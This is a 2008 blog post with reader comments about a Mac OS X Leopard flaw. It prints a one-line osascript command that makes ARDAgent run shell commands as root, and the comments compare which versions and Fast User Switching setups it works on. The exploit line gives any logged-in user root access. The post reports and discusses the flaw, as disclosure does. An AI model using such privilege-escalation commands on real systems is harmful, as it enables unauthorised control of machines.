Apple gets Pwned
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root
Wow. A one line script that allows any logged in user to grab root, not even a buffer overflow or third party software involved. This is movie plot hacking at its finest. I haven’t seen an attack this bad in years.
The only thing I would imagine that could be worse would be if you could execute this attack remotely.
June 19th, 2008 at 9:26 PM
Doesn’t work on 10.4.9.
June 20th, 2008 at 6:43 PM
Yep, doesn’t work in Tiger… but works every time in Leopard. Impressive. I hope you have reported it to Apple?
June 22nd, 2008 at 9:49 AM
I’ve verified it on Leopard and I’m told it works on Tiger, though I haven’t personally checked that.
There are a couple of things that may cause it to fail. If Fast User Switching is disabled, or if you’ve logged into an account via Fast User Switching, then I don’t think this works. Otherwise I think it does.
June 25th, 2008 at 11:06 PM
I have Fast User Switching enabled, but I logged into my account via Fast User Switching — it works on 10.5.3 under this scenario :(